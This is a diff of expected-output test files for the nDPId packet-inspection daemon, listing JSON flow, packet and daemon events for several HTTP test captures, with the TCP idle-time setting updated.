00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"}
00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}}
00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593713340401,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593713340401,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"}
00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}}
00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":1699,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593713340404}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 14/14

24
test/results/http-manipulated.pcap.out
View File

@@ -1,18 +1,18 @@
00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-manipulated.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946727901369}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}}
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":653,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":946729142063}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"}
00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}}
00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"}
00987{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}}
00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":328,"packets-processed":328,"total-skipped-flows":0,"total-l4-data-len":941545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":946729148160}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 328/328

12
test/results/http_auth.pcap.out
View File

@@ -1,11 +1,11 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_auth.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1381844050222}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
